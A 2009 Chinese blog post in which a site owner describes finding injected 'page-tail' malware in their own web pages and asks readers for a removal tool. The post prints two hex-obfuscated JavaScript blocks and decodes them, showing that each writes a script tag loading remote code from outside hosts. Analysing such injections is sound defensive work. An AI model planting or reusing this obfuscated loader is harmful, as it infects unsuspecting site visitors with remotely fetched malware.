今天打开一个自己的网页,竟发现了文件尾巴病毒源,真是可恶,空间商没做好杀毒防毒啊。
病毒源如下:
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
这是一段通过16进制编码的script病毒,当你打开含有这段代码的页面时,那你的电脑立马中毒,好狠啊!
可以通过alert来解密,例如把上面粗体字代码解密:
<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>
解密结果是:
同样的,把后面各个中括号里的代码段alert,结果这个病毒源代码就出来了。上面的病毒源代码解密结果是:
document.write("<script language=javascript src=http://gg999.5166.info/gg/gg.js></script>");
很明显,这是在你电脑执行一段javascript挂马程序,一旦你打开含有这段代码的页面,你的电脑就立即中招了。
这些病毒我暂时没找到专杀软件,例如你有上千个页面都中毒了,那是不能手动一个一个清除的了。一旦我找到专杀软件,会第一时间来博客共享。有网友发现专杀软件了吗?
☉怎样去掉QQ视频窗口的“影音文件” (2009-9-10 14:27:29)
☉软件编程中,什么是同步?什么是异步? (2009-7-14 23:14:8)
☉实例演示C#利用dotnetcharting控件生成柱状图 (2009-6-7 10:27:34)
30369OOO 的最新文章:群星-Home SPA音乐- 《玉肌美人》优雅无压的幸福美人
Liwen 于 2009-12-12 5:05:40 回复别说难遇到,我宁愿永远都不遇到呢!
Liwen 于 2009-12-9 17:21:42 回复空间商没防好毒啊
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。